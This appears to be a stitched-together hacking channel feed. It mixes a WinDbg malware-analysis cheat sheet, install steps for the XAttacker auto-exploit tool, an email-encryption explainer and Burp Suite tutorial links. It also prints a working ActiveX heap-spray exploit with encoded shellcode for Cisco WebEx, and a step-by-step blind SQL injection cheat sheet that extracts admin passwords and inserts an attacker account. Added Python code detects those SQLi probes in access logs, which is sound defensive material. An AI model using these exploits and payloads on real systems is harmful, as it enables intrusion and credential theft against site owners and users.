WinDbg Malware Analysis Cheat Sheet.pdf
2 MB
1) !address  List all memory segments in the process with their permissions and memory type. This is similar to the Memory Map in x64dbg.
2) !address [virtual address]  List information about the memory segment that contains the virtual address. For example, !address 400000 would show information about the section that contains address 0x400000. This is a quick way to find the start and end of a memory segment if you want to dump it.
3) .writemem [file name] [start address] [end address]  Dump a memory range to a file. For example, .writemem C:\dump.bin 400000 401000 would dump memory starting at 0x400000 and ending at 0x401000 to the dump.bin file.
4) eb [address] [byte]  Enter one byte into memory at the address. For example, eb 400000 0xff would change the byte at address 0x400000 to 0xff. For a full list of enter commands (string, word, etc.) see the Microsoft docs.
#full with video
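As an added example (not part of the cheat sheet or of WinDbg itself), a small Python helper that does what the `!address` / `.writemem` pair above does by hand: it parses an `!address` listing, finds the region containing a given address, and emits the matching `.writemem` line; it also lists committed private RWX regions, the usual place unpacked or injected code shows up. The listing below and its column layout are constructed assumptions, not a real capture.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of "!address" output for a 32-bit process (not a real capture);
# the columns follow the usual layout: BaseAddress, EndAddress+1, RegionSize, Type,
# State, Protect, Usage. Free regions print no Type column.
SAMPLE_ADDRESS_OUTPUT = """\
        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
        --------------------------------------------------------------------------------------------------------------
+        0`00400000        0`00401000        0`00001000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [sample.exe]
         0`00401000        0`00405000        0`00004000 MEM_IMAGE   MEM_COMMIT  PAGE_EXECUTE_READ                  Image      [sample.exe]
+        0`00600000        0`00610000        0`00010000 MEM_PRIVATE MEM_COMMIT  PAGE_EXECUTE_READWRITE             <unknown>
+        0`00610000        0`7ffe0000        0`7f9d0000             MEM_FREE    PAGE_NOACCESS                      Free
"""

HEX = r"(?:[0-9a-f]+`)?([0-9a-f]+)"          # accepts 0`00400000 as well as plain 00400000
LINE_RE = re.compile(rf"^\+?\s*{HEX}\s+{HEX}\s+{HEX}\s+(.*)$", re.IGNORECASE)

@dataclass
class Region:
    base: int       # BaseAddress
    end: int        # EndAddress+1 (exclusive)
    type: str       # MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE, "" for free memory
    state: str
    protect: str
    usage: str

def parse_address_output(text: str) -> List[Region]:
    """Turn the !address listing into Region records, skipping header lines."""
    regions = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        base, end = int(m.group(1), 16), int(m.group(2), 16)
        rest = m.group(4).split()
        if rest[0] == "MEM_FREE":            # no Type column on free regions
            mtype, state, protect, usage = "", rest[0], rest[1], " ".join(rest[2:])
        else:
            mtype, state, protect, usage = rest[0], rest[1], rest[2], " ".join(rest[3:])
        regions.append(Region(base, end, mtype, state, protect, usage))
    return regions

def find_region(regions: List[Region], address: int) -> Optional[Region]:
    """The region containing `address`, i.e. what `!address <addr>` reports."""
    return next((r for r in regions if r.base <= address < r.end), None)

def writemem_command(region: Region, path: str) -> str:
    """Build the .writemem line in the same form as the cheat sheet's example."""
    return f".writemem {path} {region.base:x} {region.end:x}"

def suspicious_regions(regions: List[Region]) -> List[Region]:
    """Committed private memory that is writable and executable: the first thing worth dumping."""
    return [r for r in regions
            if r.type == "MEM_PRIVATE" and r.state == "MEM_COMMIT"
            and r.protect in ("PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY")]

if __name__ == "__main__":
    regs = parse_address_output(SAMPLE_ADDRESS_OUTPUT)
    print(writemem_command(find_region(regs, 0x400000), r"C:\dump.bin"))
    for r in suspicious_regions(regs):
        print("RWX private region:", writemem_command(r, f"C:\\rwx_{r.base:x}.bin"))
```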
--- UNDERCODE ---
X Attacker Tool, Website Vulnerability Scanner & Auto Exploiter
INSTALLATION & RUN :
On Termux, install:
1) git clone https://github.com/Moham3dRiahi/XAttacker.git
2) cd XAttacker
3) chmod +x termux-install.sh
4) bash termux-install.sh
Installation on Windows:
1) Download Perl
2) Download XAttacker
3) Extract XAttacker into Desktop
4) Open CMD and type the following commands:
5) cd Desktop/XAttacker-master/
6) perl XAttacker.pl
SOME FEATURES :
• blocktestimonial Exploit
• Rightnow Theme Exploit
• Konzept Exploit
• Omni Secure Files Exploit
• Pitchprint Exploit
• Satoshi Exploit
• Pinboard Exploit
• Barclaycart Exploit
• Com Facileforms Exploit
• Com Jwallpapers Exploit
• Com Extplorer Exploit
• Com Rokdownloads Exploit
• Com Sexycontactform Exploit
• Com Jbcatalog Exploit
• Com Blog Exploit
• Com Foxcontact Exploit
• Drupal Geddon Exploit
@UndercodeTesting
--- UNDERCODE ---
From unauthenticated to root on a supervision appliance.pdf
469.9 KB
EyesOfNetwork ("EON") is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT management and governance. EyesOfNetwork Supervision provides event management, availability, problems and capacity
#full tutorial + pictures
Password Spraying Outlook Web Access_ Remote Shell.pdf
617.7 KB
#requested full with pictures
--- UNDERCODE ---
3 ways to encrypt emails
> There are currently three common mail encryption methods:
1) The first type: use a symmetric encryption algorithm to encrypt mail
The symmetric encryption algorithm is an early encryption algorithm with mature technology. In a symmetric encryption algorithm, the data sender processes the plaintext (original data) together with the encryption key using a special encryption algorithm, turning it into complex encrypted ciphertext, and sends it out. After receiving the ciphertext, if the recipient wants to read the original text, it needs to decrypt the ciphertext using the same encryption key and the inverse of the same algorithm to restore it to readable plaintext.
2) The second type: use PKI/CA certification to encrypt mail
Most current email encryption systems are based on this encryption method. PKI (Public Key Infrastructure) refers to the public key infrastructure, and CA (Certificate Authority) refers to the certification center; together they are referred to as "PKI/CA". The registration center is responsible for reviewing the true identity of the certificate applicant. After the review is passed, it is responsible for uploading user information to the certification center through the network, and the certification center is responsible for the final certification processing. Revocation and renewal of the certificate also need to be submitted by the registration agency to the certification center for processing. In general, the certification center faces the registration centers, the registration center faces the end users, and the registration agency is the intermediate channel between the user and the certification center. Management of public key certificates is a complex system. This encryption method is only suitable for enterprises, organizations and some high-end users. Because obtaining CA certificates is troublesome and the exchanges are cumbersome, this type of email encryption has been difficult to popularize.
3) The third type: use identity-based cryptography for email encryption
In order to simplify the key management problem of the traditional public key cryptosystem, in 1984 A. Shamir, an Israeli scientist and one of the inventors of the well-known RSA system, proposed the idea of identity-based cryptography: the user's public identity information (such as e-mail address, IP address, name, etc.) serves as the user's public key, and the user's private key is generated by a trusted center called the private key generator. In the following two decades, the design of identity-based cryptosystems became a hot research field in cryptography.
@UndercodeTesting
--- UNDERCODE ---
--- UNDERCODE ---
SOME GOOD HACKING RESOURCES
1. Setup lab with bWAPP - https://www.youtube.com/watch?v=dwtUn3giwTk&index=1&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
2. Set up Burp Suite - https://www.youtube.com/watch?v=hQsT4rSa_v0&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=2
3. Configure Firefox and add certificate - https://www.youtube.com/watch?v=hfsdJ69GSV4&index=3&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
4. Mapping and scoping website - https://www.youtube.com/watch?v=H_iVteMDRo&index=4&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
5. Spidering - https://www.youtube.com/watch?v=97uMUQGIe14&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=5
6. Active and passive scanning - https://www.youtube.com/watch?v=1Mjom6AcFyU&index=6&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
7. Scanner options and demo - https://www.youtube.com/watch?v=gANi4Kt7ek&index=7&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
8. Introduction to password security - https://www.youtube.com/watch?v=FwcUhcLO9iM&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=8
9. Intruder - https://www.youtube.com/watch?v=wtMg9oEMTa8&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV&index=9
10. Intruder attack types - https://www.youtube.com/watch?v=N5ndYPwddkQ&index=10&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
11. Payload settings - https://www.youtube.com/watch?v=5GpdlbtL1Q&index=11&list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
@UndercodeTesting
--- UNDERCODE ---
--- UNDERCODE ---
Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit code 2020 :
<html>
<body>
<object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object>
<script language=javascript>
// k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100");
var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block += block;
var memory = new Array();
var i = 0;
for (; i < 1000; i++) memory[i] = block + shellcode;
memory[i] = shellcode;
var buf2;
for (var i = 0; i < 151; i++) buf2 += "X";
buf2 += unescape(" ");
target.NewObject(buf2);
</script>
</body>
</html>
@UndercodeTesting
--- UNDERCODE ---
--- UNDERCODE ---
ASP+PHP standard SQL injection statements (full version)
1) Determine whether there is an injection point
'; and 1=1 and 1=2
2) Guess the table name; the usual names are nothing more than admin, adminuser, user, pass, password, etc.
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) -- judge whether the admin table exists
3) Guess the number of accounts. If 0< returns the correct page and 1< returns the error page, the number of accounts is 1.
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4) Guess the field name: put the field name we think of inside the len() brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(<user field name>)>0)
and 1=(select count(*) from admin where len(<password field name, e.g. password>)>0)
5) Guess the length of each field. To guess the length, change the value after > 0 until the correct page is returned.
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)
and 1=(select count(*) from admin where len(name)>5)
and 1=(select count(*) from admin where len(name)=6)
and 1=(select count(*) from admin where len(password)>11)
and 1=(select count(*) from admin where len(password)>12)
and 1=(select count(*) from admin where len(password)=12)
6) Guess the characters
and 1=(select count(*) from admin where left(name,1)='a')--
and 1=(select count(*) from admin where left(name,2)='ab')--
Add one character at a time and keep guessing like this until you have guessed as many characters as the length found above; that gives the account name.
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51)--
The result is converted into characters.
'group by users.id having 1=1--
'group by users.id, users.username, users.password, users.privs having 1=1--
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name='Rahul'--
Check the server patch level (if an error is returned, the SP4 patch has been applied):
and 1=(select @@VERSION)--
Check the permissions of the database connection account; if the page returns normally, the account has the sysadmin server role.
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))--
Determine the database connection account (if the page returns normally when using the SA account, the connected account is SA):
and 'sa'=(SELECT System_user)--
and user_name()='dbo'--
and 0<>(select user_name())--
@UndercodeTesting
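As an added example from the defender's side (not part of the post above), Python detection logic that URL-decodes requests from access-log lines and flags the probing steps the post lists: the 1=1 / 1=2 tautology pair, count(*) table and row probes, len()/left()/mid() guessing, INFORMATION_SCHEMA enumeration and the role/identity checks. The log lines, the news.asp parameter and the signature names are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log sample (not a real capture): one host walks the post's steps
# against news.asp, plus two benign requests that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01] "GET /news.asp?id=5 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:02] "GET /news.asp?id=5%20and%201=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:03] "GET /news.asp?id=5%20and%201=2 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2020:10:00:04] "GET /news.asp?id=5%20and%200%3C%3E(select%20count(*)%20from%20admin) HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:05] "GET /news.asp?id=5%20and%201=(select%20count(*)%20from%20admin%20where%20len(name)%3E6) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2020:10:00:06] "GET /news.asp?id=5%20and%201=(select%20count(*)%20from%20admin%20where%20left(name,1)='a')-- HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2020:10:00:07] "GET /news.asp?id=5%20and%201=(SELECT%20IS_SRVROLEMEMBER('sysadmin'))-- HTTP/1.1" 500 300
10.0.0.7 - - [01/Jan/2020:10:00:08] "GET /search.asp?q=left%20handed%20admin%20and%20more HTTP/1.1" 200 2048
"""

# Each signature corresponds to one step of the probing sequence described in the post.
SIGNATURES = [
    ("tautology probe (step 1)",  re.compile(r"\band\s+1\s*=\s*[12](?!\d)")),
    ("table existence (step 2)",  re.compile(r"0\s*<>\s*\(\s*select\s+count\(\*\)\s+from\s+\w+\s*\)")),
    ("row count (step 3)",        re.compile(r"\b[01]\s*<\s*\(\s*select\s+count\(\*\)\s+from\s+\w+\s*\)")),
    ("field length (steps 4-5)",  re.compile(r"count\(\*\)\s+from\s+\w+\s+where\s+len\s*\(")),
    ("char extraction (step 6)",  re.compile(r"where\s+(?:left\s*\(|asc\s*\(\s*mid\s*\()")),
    ("schema enumeration",        re.compile(r"information_schema\.columns|union\s+select\s+top\s+1")),
    ("privilege/identity probe",  re.compile(r"is_srvrolemember|system_user|user_name\s*\(|@@version")),
]
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST)\s+(\S+)')

def normalise(url: str) -> str:
    """URL-decode (twice, to catch double encoding), lower-case and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(url)).lower()
    return re.sub(r"\s+", " ", decoded)

def classify_request(url: str) -> list:
    """Names of every blind-SQLi signature that matches the request, in SIGNATURES order."""
    text = normalise(url)
    return [name for name, rx in SIGNATURES if rx.search(text)]

def scan_log(text: str) -> list:
    """(client_ip, url, labels) for each request matching at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify_request(m.group(2))
        if labels:
            hits.append((m.group(1), m.group(2), labels))
    return hits

def hits_per_client(hits) -> Counter:
    """Flagged requests per source IP: one host walking several steps is the strong signal."""
    return Counter(ip for ip, _, _ in hits)

if __name__ == "__main__":
    for ip, url, labels in scan_log(SAMPLE_LOG):
        print(ip, labels, url)
    print(hits_per_client(scan_log(SAMPLE_LOG)))
```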
--- UNDERCODE ---
Forwarded from UNDERCODE HACKING
Please choose an option (5h vote):
Final Results
21% - More Linux/Termux Tools ?
24% - More Courses ?
19% - More Hacking Tips ?
14% - More about social media pentesting ?
22% - More related webHacking ?